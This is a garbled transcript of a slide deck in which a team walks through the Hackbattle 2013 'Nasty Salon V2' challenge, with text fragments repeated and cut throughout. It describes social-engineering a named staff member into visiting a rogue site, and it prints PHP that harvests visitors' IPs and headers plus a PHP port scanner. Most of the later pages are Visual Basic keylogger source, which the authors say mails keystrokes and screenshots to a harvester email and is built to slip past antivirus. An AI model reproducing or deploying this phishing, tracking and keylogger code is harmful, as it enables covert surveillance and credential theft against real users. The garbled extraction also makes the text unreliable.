Hackbattle 2013 Walkthrough (Nasty Salon V2)

50
Munir Njiru | Hack Wa || Ruth Efrain || Ibrahim Gathu kBattle 2013 alkThrough ungu March 28, 2014 3

description

This is a walkthrough of the Challenge by Chuks (Nasty Salon V2) which formed the Hackbattle 2013.

Transcript of Hackbattle 2013 Walkthrough (Nasty Salon V2)

Page 1: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

HackBattle 2013 WalkThrough

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

HackBattle 2013 WalkThrough

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

HackBattle 2013 WalkThrough

Page 2: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

The Scenario

The Process

The Server looks well protected from the above scenario but it also shows evidence of workstations which are not behind the same firewall. This in the team 0wnErz case was the best target but how to get to them was the tricky bit. So the starting point was what we see i.e.

http://197.232.19.194

Looking at the site static html nothing fancy on it no php code therefore ruling out all possibility of SQL injections which is everyone’s juicy cake. Going for the forms, drat those mail too so no PHP

The worst you get was directory listing and a failed adobe gallery scripts missing from the gallery page, damn those would have helped us read the logs as they need that access to work. So what

Found 2 emails:

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

protected from the above scenario but it also shows evidence of workstations which are not behind the same firewall. This in the team 0wnErz case was the best target but how to get to them was the tricky bit. So the starting

Looking at the site static html nothing fancy on it no php code therefore ruling out all possibility of SQL injections which is everyone’s juicy cake. Going for the forms,

PHP form to post to .

The worst you get was directory listing and a failed adobe gallery scripts missing from the gallery page, damn those would have helped us read the logs as they

So what now. Look at what the site has to offer.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

protected from the above scenario but it also shows evidence of workstations which are not behind the same firewall. This in the team 0wnErz case was the best target but how to get to them was the tricky bit. So the starting

Looking at the site static html nothing fancy on it no php code therefore ruling out all possibility of SQL injections which is everyone’s juicy cake. Going for the forms,

The worst you get was directory listing and a failed adobe gallery scripts missing from the gallery page, damn those would have helped us read the logs as they

now. Look at what the site has to offer.

Page 3: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

[email protected][email protected]

So basically for now we have 2 managers a here the push was for the business manager let’s see if she can help us.

So our First contact was to complain about the lack of user experience on the appointment page , nothing fancy just to see how she takes it andaudience. This is how it went.

She replied and it’s apparent that shenoted though she copied daniella in the response who we found out is Daniel and the email was misspelled on the site. about the where abouts but noticing there is arecorded but where?? , nice!!!!!!

A little bit more talk and she asks for more information about us and we gladly give our alias justifying our email too as to why it is not so personalized ;). On doing this and the rapport building up Joan mentions something important … she input us in the database and she has access to it, also from her email we can see that there’s an application to manage a database.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

[email protected] –Manager (Home Page) [email protected] – IT Staff Manager (About Us Page)

So basically for now we have 2 managers a business one and a techie one, so from here the push was for the business manager let’s see if she can help us.

So our First contact was to complain about the lack of user experience on the appointment page , nothing fancy just to see how she takes it and gauge our audience. This is how it went.

it’s apparent that she does care about user experience one thing noted though she copied daniella in the response who we found out is Daniel and the email was misspelled on the site. So next a little bit of more getting to know about the where abouts but noticing there is a “database” where we have been

, nice!!!!!!.

A little bit more talk and she asks for more information about us and we gladly give stifying our email too as to why it is not so personalized ;). On doing this

and the rapport building up Joan mentions something important … she input us in access to it, also from her email we can see that there’s

o manage a database.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

IT Staff Manager (About Us Page)

business one and a techie one, so from here the push was for the business manager let’s see if she can help us.

So our First contact was to complain about the lack of user experience on the gauge our

does care about user experience one thing noted though she copied daniella in the response who we found out is Daniel and

So next a little bit of more getting to know where we have been

A little bit more talk and she asks for more information about us and we gladly give stifying our email too as to why it is not so personalized ;). On doing this

and the rapport building up Joan mentions something important … she input us in access to it, also from her email we can see that there’s

Page 4: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim GathunguMunir Njiru || Ruth Efrain || Ibrahim GathunguMunir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Page 5: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

I don’t know about you but most people I know have :

• phpMyAdmin • sqlbuddy

Let’s go with number one though , most common install directories for the system. Well long story short after a slow trial and eknow right. ☺ Progress Finally but now we need to tread carefully.

Now there are 2 things we can do:

• try exploit the phpMyAdmin• try trap Joan and compromise Joan’s machine since she has access

We decided to try both but weigh our chances. phpMyAdmin

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

I don’t know about you but most people I know have :

Let’s go with number one though , most common install directories for the system. Well long story short after a slow trial and error we found a /data directory. Cool I

Progress Finally but now we need to tread carefully.

Now there are 2 things we can do:

try exploit the phpMyAdmin and compromise Joan’s machine since she has access

We decided to try both but weigh our chances. So step one was view the

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Let’s go with number one though , most common install directories for the system. rror we found a /data directory. Cool I

and compromise Joan’s machine since she has access

So step one was view the

Page 6: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Also notice test.php well that’s phpinfo awesome wealth of information about the server:

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Also notice test.php well that’s phpinfo awesome wealth of information about the

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Also notice test.php well that’s phpinfo awesome wealth of information about the

Page 7: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Server root: /etc/apache2

webroot: /var/www/

User/Group www-data(33)/33

php version: 5.5.3-1ubuntu2.2

allow_url_fopen On

mysql: 5.5.35

internal IP: 192.168.200.2

Back to phpMyAdmin Well we are dealing with one revision from the latest version: its 4.1.8.

What are the odds we will kill this thing and go freeyou that no user goes in without a pass so we download the same version of phpmyAdmin and install it on our end now only one problem we create a valid login to a default db i.e. mysql however we can’t replay the 4 cookies, as later is because the online one lacked mcrypt while we had it therefore our cookie pattern was quite different.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Back to phpMyAdmin Well we are dealing with one revision from the latest version:

What are the odds we will kill this thing and go free, well seeing the prompt tells you that no user goes in without a pass so we download the same version of phpmyAdmin and install it on our end now only one problem we create a valid login to a default db i.e. mysql however we can’t replay the 4 cookies, as we realized later is because the online one lacked mcrypt while we had it therefore our cookie

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Back to phpMyAdmin Well we are dealing with one revision from the latest version:

well seeing the prompt tells you that no user goes in without a pass so we download the same version of phpmyAdmin and install it on our end now only one problem we create a valid login

we realized later is because the online one lacked mcrypt while we had it therefore our cookie

Page 8: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

“God Blesses those who put errors on their homepage and this server wasn’t

blessed it was cursed!!! ”

So lets go the Joan way first if she has access to this we shall know but we need to be smart about this so here is the breakdown of the needs.

• Find Joan’s environment she must be one of the workstations , what’s she running , what’s her address etc.

• Come up with a super trap and hook joan to it then get enough info to steal her credentials and login as her.

So for the first team 0wnErz went with make the competition so acquire a rogue domain first we we got (http://spa.oo3.co). We took a few days to just make a nice HTML site for a spa but added a bit of php code in two sections: the first took her information as she visited in the home page and wrote to a text file and incase she missed that we had another similar hook that mailed us the information when she submitted a form.

The information we needed most was :

• IP • Full User Agent Information Including OS information to aid in performing our

attack.

Page 9: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

The Site:

The script on the homepage had this php added to itgot a summary of just what we needed and the second everything incase there were extras: <?php

$filename="0xt0uaipg.africahackon";

$filename2="0xt0uaipg2.africahackon";

$data="Server IP: ".$_SERVER['REMOTE_ADDR']."".$_SERVER['HTTP_USER_AGENT']."############################################################################################

file_put_contents($filename, $data, FILE_APPEND, $context = null);

foreach ($_SERVER as $key => $value) {

$fullheaders .= $key . ": " . $value . "

file_put_contents($filename2, $fullheaders, FILE_APPEND, $context = null);

}

?>

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

The script on the homepage had this php added to it, it wrote to two files the first ry of just what we needed and the second everything incase there

$filename="0xt0uaipg.africahackon";

$filename2="0xt0uaipg2.africahackon";

$data="Server IP: ".$_SERVER['REMOTE_ADDR']."\n User Agent: ".$_SERVER['HTTP_USER_AGENT']."\n X-Forwarder:".$_SERVER['HTTP_X_FORWARDED_FOR']."############################################################################################ \n\n";

file_put_contents($filename, $data, FILE_APPEND, $context = null);

foreach ($_SERVER as $key => $value) {

fullheaders .= $key . ": " . $value . "\n \n";

file_put_contents($filename2, $fullheaders, FILE_APPEND, $context = null);

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

, it wrote to two files the first ry of just what we needed and the second everything incase there

orwarder:".$_SERVER['HTTP_X_FORWARDED_FOR']."\n ###############################################################

Page 10: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

So we talked to Joan to check it out

and she did:

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

So we talked to Joan to check it out ;)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Page 11: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

So she is on an XP and her IP is thathere if we go for a browser attack but let’s check if the IP is for a router or Proxy or the actual machine. So we made a simple port scanner none noisy

<?php

echo "####################################<br/>PortScanner <br/>\n ####################################<br/><br />

$host = "197.232.19.195";

$ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","3306","3389","5900","8080");

$arrlength=count($ports);

for($i=0;$i<$arrlength;$i++) {

$fp = fsockopen($host,$ports[$i],$errno,$errstr,10);

if($fp)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

her IP is that as is on screen, Firefox 27 damn a lot of work here if we go for a browser attack but let’s check if the IP is for a router or Proxy or the actual machine. So we made a simple port scanner none noisy ☺

echo "####################################<br/>\nTeam 0wnErz Hn ####################################<br/><br />

$ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","330

$fp = fsockopen($host,$ports[$i],$errno,$errstr,10);

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

, Firefox 27 damn a lot of work here if we go for a browser attack but let’s check if the IP is for a router or Proxy or

nTeam 0wnErz HB2013 n ####################################<br/><br />\n";

$ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","330

Page 12: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

{

echo "port " . $ports[$i] . " open on " . $host ."<br />

echo "<br/>";

fclose($fp);

}

else

{

echo "port " . $ports[$i] . " closed on " . $host . "<br />

echo "<br/>";

}

flush();

}

?>

Anyway as you can see nothing fancy fsock is like telnet in PHP :D only we can do it from our webserver online or locally if it gets blacklisted easy to move to another server and continue but we didn’t

Rdesktop interesting is on this thing and

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

echo "port " . $ports[$i] . " open on " . $host ."<br />\n";

echo "port " . $ports[$i] . " closed on " . $host . "<br />\n";

Anyway as you can see nothing fancy fsock is like telnet in PHP :D only we can do it or locally if it gets blacklisted easy to move to another

server and continue but we didn’t,…. no noise :D

Rdesktop interesting is on this thing and http but rdesktop is important lets test it.

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Anyway as you can see nothing fancy fsock is like telnet in PHP :D only we can do it or locally if it gets blacklisted easy to move to another

but rdesktop is important lets test it.

Page 13: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Windows Server 2003 WTF :D . Ok someone’s playing us so now part 2 of our attack needs to be smart we don’t have

Since we are dealing with an XP , that but either way we will need a windows payload , windows xp and server 2003 lack elevated desktop so binding some nice appgood results. If you like commercially done keyloggers you can get things like redfox and ardamax etc limitless but nway save yourself the hustle and write some code signature based AV’s won’t have them most probably and keep it on simple logic not complex hooks those get flagged

Don’t get jealous ours does :

• Screenshots and keys every ten minutes to our harvester email. and apps keys have been trapped fromway don’t download and run :D

Note:

You need a harvester email preferably a

Here is a snippet from the logic of our keylogger

‘basic emailer include and simple system output

Imports System.IO

Imports System.Net.Mail

‘ yes if you are asking why the driver declares below itwork with what windows already has.

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Windows Server 2003 WTF :D . Ok someone’s playing us so now part 2 of our attack needs to be smart we don’t have a very direct target.

ince we are dealing with an XP , user agent didn’t lie or rather we chose to believe that but either way we will need a windows payload , windows xp and server 2003 lack elevated desktop so binding some nice application to a keylogger

If you like commercially done keyloggers you can get things like redfox and ardamax etc limitless but nway save yourself the hustle and write some

signature based AV’s won’t have them most probably and keep it on simple those get flagged.

Don’t get jealous ours does :

Screenshots and keys every ten minutes to our harvester email. and apps keys have been trapped from we put our things together the simple way don’t download and run :D.

email preferably a Gmail one. Easiest to send to.

Here is a snippet from the logic of our keylogger in VB.

‘basic emailer include and simple system output

‘ yes if you are asking why the driver declares below its because we want to reduce dependencies and work with what windows already has.

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Windows Server 2003 WTF :D . Ok someone’s playing us so now part 2 of our

didn’t lie or rather we chose to believe that but either way we will need a windows payload , windows xp and server 2003

lication to a keylogger should yield If you like commercially done keyloggers you can get things like

redfox and ardamax etc limitless but nway save yourself the hustle and write some signature based AV’s won’t have them most probably and keep it on simple

Screenshots and keys every ten minutes to our harvester email. And keys we put our things together the simple

one. Easiest to send to.

s because we want to reduce dependencies and

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Page 14: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer, ByVal dwType As Integer) As Integer

Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32

Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32

‘basic house cleaning for caps and shift key presses so that we accurately record letters as caps or not caps in our main keylogger

Public Function CAPSLOCKON() As Boolean

If My.Computer.Keyboard.CapsLock = True Then

Return True

Else

Return False

End If

End Function

Dim mimiNiCapsAmaLa As Integer

Dim Shifter As Integer

‘Keylogger Engine- usually behind your timer ;) ours is a 10 minute space on the highest of our 3 timers and a textbox to pass your data through.

Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey)

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "A"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "a"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "B"

Page 15: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "b"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "C"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "c"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "D"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "d"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "E"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "e"

Page 16: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "F"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "f"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "G"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "g"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "H"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "h"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)

Page 17: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "I"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "i"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "J"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "j"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "K"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "k"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "L"

End If

Page 18: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "l"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "M"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "m"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "N"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "n"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "O"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

Page 19: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

txtNishikieKeys.Text = txtNishikieKeys.Text & "o"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "P"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "p"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "Q"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "q"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "R"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "r"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)

Page 20: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "S"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "s"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "T"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "t"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "U"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "u"

End If

